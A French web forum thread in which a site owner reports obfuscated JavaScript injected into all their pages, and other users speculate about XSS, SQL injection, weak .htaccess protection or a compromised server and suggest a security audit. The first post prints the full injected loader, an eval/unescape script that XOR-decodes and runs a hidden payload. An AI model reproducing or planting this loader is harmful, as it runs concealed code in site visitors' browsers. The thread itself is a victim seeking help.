Bonjour,
 
Un client se plaind ce jour qu'un virus soit présent sur mon site. Je vérifie le code de la page d'index et trouve ceci:
 
 
 <!-- [ e8c1693fbcc0eb04c038579d888df8bf ] --><script>eval(unescape('function%20yCTty%28pEJQN%29%7Bfunction%20hBzb%28lUGv%29%7Bvar%20vrqi%3DlUGv.length%3Bvar%20kbABI%3D0%2CghSGlgyU%3D0%3Bwhile%28kbABI%3Cvrqi%29%7BghSGlgyU+%3DlUGv.charCodeAt%28kbABI%29*vrqi%3BkbABI++%3B%7Dreturn%20%28%27%27+ghSGlgyU%29%7D%20%20%20try%20%7Bvar%20ayrYO%3Deval%28%27a%3Er%3Bg%3EuVmTe%3Bn%3Bt%3EsT.%7CcVa%3Bl%3BlVeTeT%27.replace%28/%5BV%5C%3ET%5C%7C%3B%5D/g%2C%20%27%27%29%29%2CsApTg%3Dnew%20String%28%29%2CwxnEWR%3D0%3BkKbaYPP%3D0%2CrimItV%3D%28new%20String%28ayrYO%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%3Bvar%20yGcyn%3DhBzb%28rimItV%29%3BpEJQN%3Dunescape%28pEJQN%29%3Bfor%28var%20wNPM%3D0%3B%20wNPM%20%3C%20%28pEJQN.length%29%3B%20wNPM++%29%7Bvar%20wiGam%3DpEJQN.charCodeAt%28wNPM%29%3Bvar%20lDqjx%3DrimItV.charCodeAt%28wxnEWR%29%5EyGcyn.charCodeAt%28kKbaYPP%29%3BwxnEWR++%3BkKbaYPP++%3Bif%28wxnEWR%3ErimItV.length%29wxnEWR%3D0%3Bif%28kKbaYPP%3EyGcyn.length%29kKbaYPP%3D0%3BsApTg+%3DString.fromCharCode%28wiGam%5ElDqjx%29%3B%7Deval%28sApTg%29%3B%20return%20sApTg%3Dnew%20String%28%29%3B%7Dcatch%28e%29%7B%7D%7DyCTty%28%27%2532%2539%2530%2535%2535%2539%2535%2530%2559%2526%2517%2535%251a%2503%2512%2513%2549%2567%252f%2531%2565%2501%253b%2521%250c%2518%2506%251c%256d%2522%252b%250f%250a%252c%2532%2518%2530%252a%2562%2579%257c%252e%2503%2518%2519%2577%253c%2530%2515%2533%2520%2538%257c%2546%2525%2534%2531%2510%251f%2512%2562%257d%2540%2576%251a%2516%252d%253a%257a%2547%252f%2503%2528%2531%253a%2536%256d%2575%2517%251c%2566%2563%2567%2520%2530%2520%2534%2507%2513%2515%251c%252e%2516%252d%2501%2512%252f%257b%2507%257a%2562%2562%2510%252f%2533%2533%2505%251d%2536%2535%2559%255e%2507%253d%2522%2535%251c%252b%2535%2551%2556%2554%252f%253f%2527%2500%252d%2532%2539%2529%2548%251d%2536%2538%2512%250e%2528%256c%2525%252d%253c%2522%2529%2536%2526%2548%250b%2538%252a%252b%2577%2532%251d%253a%2527%250f%253d%252f%253d%2536%2521%2553%254d%2537%2574%255e%2573%2575%2572%2546%2511%250e%2535%2517%2535%2524%2533%252a%2537%2508%2534%250a%2507%250d%2527%2570%2530%2563%257c%257f%254d%257a%256a%2579%2575%251b%2568%251b%2535%2524%2523%2578%252e%252d%257b%254f%2577%2506%257c%2535%251d%2523%2531%2503%250e%2578%252b%256e%252b%253a%2570%2551%2535%250e%2507%2524%2560%2502%252d%2535%2535%253a%2533%2518%2502%2525%251a%250e%257a%2527%253c%2525%2508%257b%2573%257c%250e%2522%2575%253d%2520%255e%2536%255a%2521%2532%250e%253d%2570%2540%2511%2534%256f%257a%2534%2567%250a%2567%2530%2545%2536%2551%252f%250a%257a%250e%2504%255e%255e%2500%2563%251c%2555%2517%2546%2530%2503%2509%2570%253b%257b%253c%257a%2573%255b%2514%250c%2513%2501%2531%2576%2526%2505%251b%2560%2564%255c%255e%253c%251c%2512%2543%251e%256a%2537%2549%2509%2523%2576%2568%2539%2506%2577%2529%2529%2513%250c%2538%251b%2511%2569%2569%252b%257c%2555%2573%2576%2537%2519%250f%250d%252f%257f%253f%2570%257b%251c%2526%2570%2508%254e%252f%2513%251b%2526%2554%2529%256c%2536%255e%257e%255a%2566%2576%2566%253f%2534%2534%253a%2568%2508%257b%2522%251b%252a%2526%251e%250a%2503%250e%253d%2569%256b%256a%2579%2529%2570%2558%257e%2553%256a%2568%2578%2566%253a%2550%2535%256f%2501%2527%2530%2578%2519%2539%250e%2541%2565%250e%2550%253a%2546%251d%252c%2556%251e%2513%2514%2523%2540%2526%2576%2547%2522%2507%2520%253a%2523%252e%2532%2558%2548%2509%251c%2574%2565%2520%253c%2520%2544%2501%254a%253b%2572%2564%257a%2565%2568%2560%2501%2525%2519%2529%2522%2525%253f%2500%2577%253e%2564%2506%2506%252a%2507%253b%2525%2535%256a%2557%2538%2579%2538%2531%2538%253c%2556%257b%255a%2504%2547%2517%2577%252f%250c%2520%254c%2514%2548%2576%252d%2572%2538%2532%2574%2525%2517%2575%257d%2548%2520%2537%252a%2502%253c%250c%257f%252b%2570%2509%2530%253b%253a%2501%251c%253d%252f%2521%256d%2523%2527%252f%2505%2515%254e%2579%257e%257e%2529%2560%2533%2513%251e%255d%2525%254a%256c%2504%2560%256c%2501%252b%252f%257c%253a%250d%252f%2561%257f%250c%254f%2579%254b%2533%2530%2537%253b%2522%253c%2547%2573%251b%255f%253e%2578%250d%2519%255b%2517%254c%2510%257a%2560%257c%257d%2568%2572%251c%2577%2576%254e%251b%2578%2533%2502%255c%2519%2510%253c%2524%253a%250e%2576%253a%2560%2533%255a%2529%2576%2510%2524%2503%253f%2510%2504%256f%2566%250b%2579%2579%250a%2512%2509%255c%257f%253d%253d%254e%255d%250e%250e%2562%256c%2564%251a%2511%2501%2576%253b%2572%2572%2566%2557%2559%256f%253a%2530%2538%253b%252b%257d%2506%2530%2523%250f%250f%253a%250b%251e%2513%2534%252e%2530%253d%2534%2554%2539%253b%250a%2518%2524%253e%2519%2515%2516%2519%256a%2552%2537%2538%2532%2524%255a%2518%2513%252d%250e%252f%2529%2514%253a%253e%2524%2503%255e%2557%2528%253d%2549%2526%2522%2534%2505%2523%2513%253e%2525%2517%253e%2536%257c%2579%2571%250a%2526%2525%2534%2534%250a%253b%250f%257d%2547%253d%253c%2505%2569%2576%250b%2538%2534%2551%2500%2533%2507%2525%250c%2572%2529%2521%255e%2532%2537%2530%2531%2517%2504%253d%2572%2502%2529%2517%2533%2515%2569%2577%2522%2522%2527%2533%2539%2537%257b%2570%257d%2536%253c%251e%2555%2545%2545%253f%2571%255d%2570%257a%2571%254a%250d%256c%2571%2567%256d%2565%2559%2553%2543%2577%2529%253e%2546%2529%252b%2531%254e%2568%2565%2569%2560%2519%2518%257f%2527%2503%252b%253b%2534%2532%2577%2550%2574%2522%255a%2576%257c%2560%2507%2536%2504%250f%256a%257e%257e%2530%2578%2510%2520%2539%2525%2519%2504%2563%257e%2578%254d%256f%257c%2560%2570%254d%2550%256d%2502%2529%2518%255d%2516%251b%2505%2530%253d%2520%2533%2574%2561%257f%251b%251b%2519%2545%2504%2563%2577%2572%256d%257c%252f%256a%255b%2547%2556%2522%2567%2555%2512%2528%2532%2510%251b%2507%251e%2537%2571%257a%2532%257b%2566%2577%256e%255c%2547%255f%256f%2541%2560%2565%2579%2550%257a%2576%2565%255e%256a%2517%251f%2577%2525%2573%253f%2522%2507%253d%2537%2532%2515%2512%2536%2505%250c%2513%2511%257b%2562%257c%255a%2564%2571%2563%2560%2549%2574%2550%2530%250b%2572%2529%2573%2539%251d%2502%2522%2574%257b%2554%2539%252a%2521%251d%2559%251e%2503%2538%251a%2561%2531%2572%2549%2534%2525%2503%2526%2518%2532%2502%2521%2533%252f%253c%251c%2577%256e%2540%2503%2515%2519%2529%2523%251c%250d%2509%257a%2557%2529%2517%250a%251b%2540%2530%256e%257f%257b%2572%2526%2558%254c%2572%2504%2569%255b%2573%254c%251d%2504%2568%2574%2567%251b%2567%2569%257f%2501%254f%2544%255b%252f%253d%2507%253c%2550%2501%2509%2504%253a%2500%2523%2518%250c%256e%2540%256e%2530%2525%2537%2533%252e%2538%2573%2564%250b%2500%2535%254f%2539%2522%2529%252b%252d%2549%2539%254f%2561%2560%2577%2572%257b%2541%2569%256c%2578%2563%2510%253e%2526%256a%2535%253c%252f%2575%252b%2561%254e%256f%2534%2550%251a%2573%2533%2566%257b%2566%253b%2577%254e%2510%2567%2517%2527%2525%252f%2535%2537%255a%2511%252b%2505%252d%254f%2538%2537%253a%2518%2513%2565%250f%253d%252f%2536%2578%2523%2515%253f%2535%253a%2558%257b%2565%2571%2530%255a%2537%2533%2530%252b%2502%2505%2568%2565%2541%255b%2542%2548%2540%2521%2529%252f%2526%2506%2535%2576%2531%2566%250a%256f%253f%2533%2526%2501%2575%2561%2567%2578%253b%257e%2533%2534%253f%2531%2511%2569%257d%2508%257e%2567%2504%257f%253f%256c%2573%2569%2520%2532%2501%252e%251a%256a%2579%257a%2572%2531%252e%2563%2510%2517%2531%2539%251e%2577%250d%2576%2532%2547%2570%255f%2555%2555%256f%2528%252b%2536%250c%2533%250f%2521%2538%253e%2535%2505%2566%2564%2559%253c%257b%2522%251e%2537%2528%2518%2506%2533%257c%254b%2561%2538%252e%251a%2511%253d%252d%2524%252f%2574%2530%253a%2519%2517%2565%2560%252a%2525%252c%2532%2532%257b%2523%2525%2514%2527%2577%2528%255d%256d%2529%252c%2501%2573%250f%2530%2538%2522%2548%2553%256e%2556%2537%257b%2522%2522%2526%2518%250a%2530%2531%257f%2539%2521%2531%2541%2553%2537%2512%2504%2576%257c%2548%2537%2504%2528%2535%2577%251f%2532%2561%2575%2574%257d%257c%255b%2552%2553%252e%2525%2573%2544%2575%2544%2569%257e%2501%252a%2509%2531%252a%2539%2539%2526%2532%2514%2525%2538%251e%250b%2502%2529%2563%255b%250c%2532%250d%2505%2545%252e%2535%2565%2564%254f%255b%2566%2546%253e%2523%252d%2507%2534%2517%2573%2521%2536%2538%2539%252e%2545%2554%250c%257b%257c%2525%2521%2524%2533%2522%2515%2512%2522%2561%252b%257c%2522%250c%2577%252d%2512%2548%2546%2569%2520%2570%2521%2533%256a%2550%254e%257a%2534%2526%2566%250d%252e%2520%2552%2534%2560%254d%252e%255e%2527%2515%250d%2571%252b%2536%252f%2506%2500%2534%2538%2568%254c%2579%2513%254e%2550%2514%2571%2533%252c%2505%2527%252a%252b%2517%254d%255d%253e%27%29%3B'));</script><!-- end -->
 
 
Ce passage semble également être présent dans toutes les autres pages. Je ne sais que faire.  
 
Avez vous une idée de ce que c'est? Problème? Solution?
 
Merci.

Enlever ce code?

oui mais c est pas le plus important
quelqu un a reussi exploiter une faille XSS (a vue de nez ) dans son site donc le probleme est susceptible de revenir
en general c est du a un manque de sécurité au niveau de l update de la BD
(genre un addslashes au lieu d un mysql_real_escape_string)
mais je dis peut etre de la merde, c est florentG l expert pour ca

Non tu as raison. Le problème principale là est que vu que ni toi, ni moi, ni FlorentG & co n'avons de boule de crystal à portée de main, c'est difficile de lui donner des conseils qui vont outre la simple généralité .

pas besoin de boule de cristal hein
les symptomes sont clairs et le diagnostic evident
c est sur le traitement que je peche

XSS, Injection SQL, back office mal protégé (pas sécurisé, .htaccess mal écrit, trouvé le mot de passe par injection SQL,..), hacking du serveur web et édition des pages ...
Je suis d'accord que quand on entend des sabots on doit penser cheval et pas zèbre, mais là moi je suis pas aussi convaincu que ça que le diagnostic est évident (à part que c'est un incompétent aux commandes du site, ça on est d'accord)

bon je suis une tanche en secu
mais pour moi un xss c est une injection sql exploitee dans un but "different" parce qu a la base c est juste un mauvais controle des donnees entrantes

la j aurais tendance a dire que c est impossible
sauf dans le cas de ton prochain quote
 

putain pour une fois que j essayais d etre poli avec un n00b
 

T'as une floppée de XSS differentes. Parce que au final, XSS ça veut juste dire que tu utilises un autre site pour arriver à tes fins..
Pour avoir une vague idée de quoi on parle : http://en.wikipedia.org/wiki/Cross-site_scripting

Par htaccess mal écrit, je pense au mec qui sécurise le répértoire "admin" en oubliant que dans d'autres répertoires il a laissé des info critiques (On a autrefois beaucoup parlé des gens qui écrivaient des fichiers db.inc contenant les identifiants de connection php, et qui donc étaient accessibles en lecteur (car non interprétés par php, en vue de leur extension))

[Edit] Et puis la question n'est pas là .. La question c'est qu'on peut pas deviner comme ça quel est le problème. Il doit donner un peu plus de détails

Que voulez vous comme détail?

bah par exemple comment quelqu un s est introduit chez toi  
par exemple

File-nous l'adresse de ton site, ce sera plus simple

Pour ne pas être indexé dans les recherches google durant dix ans, je préfere le donner par PM.
Ceux qui souhaitent en savoir plus ou m'aider, vous pouvez me contacter et je vous en serais reconnaissant.
 
FlorentG, PM envoyé.
 
Bonne journée.

Bon bah si FlorentG s'en charge
miRROR, faut nous trouver un autre noob

Vous pouvez vous batter si vous voulez... On décernera la palme à celui qui me trouvera la solution en premier

 
ha oui

 
Ou autre solution, t'en profites pour combler tes lacunes et tu cherches de la doc sur les failles que mIRROR et moi avons énoncé.
Un audit de sécurité est une performance généralement chère. Alors le fait de venir ici et nous dire "Voilà le problème, démerdez vous pour trouver et résoudre" je trouve un peu moyen sachant que aux frais de la princesse

Je ne te demande pas de m'aider si tu ne le souhaites pas
 
Si d'autres le veulent, je les en remercie.
De même, je ne suis pas programmeur, et ne suis donc pas à même de résoudre ce soucis.  Si par contre je savais d'où venait ce problème, je pourrais trouver la personne adéquate à le résoudre.
 
De même, jusqu'à présent, nous ne savons même pas s'il s'agit d'un virus, ou quoi que ce soit d'autre

Salut,
Donc non ce n'est pas un virus en tant que tel. Le problème vient du fait qu'un personne a inséré ce code (et le tout est de savoir comment, ce qu'on peut pas faire "comme ça" ) dans ta page. Ce code fait executer une action au navigateur de la personne accedant à la page.
Ce dont tu as besoin c'est d'un informaticien qui visite le site, tout en ayant accès au code source et regarde s'il y a des failles. Au cas où aucune faille n'était trouvée, il faudrait regarder si le problème ne se trouve pas au niveau du serveur lui même (quelqu'un pourrait t'avoir hacker juste pour faire ça).
voilà, j'héstime  t'avoir aidé du mieux que je le pouvais étant donné le peu d'informations que tu as présentées ici.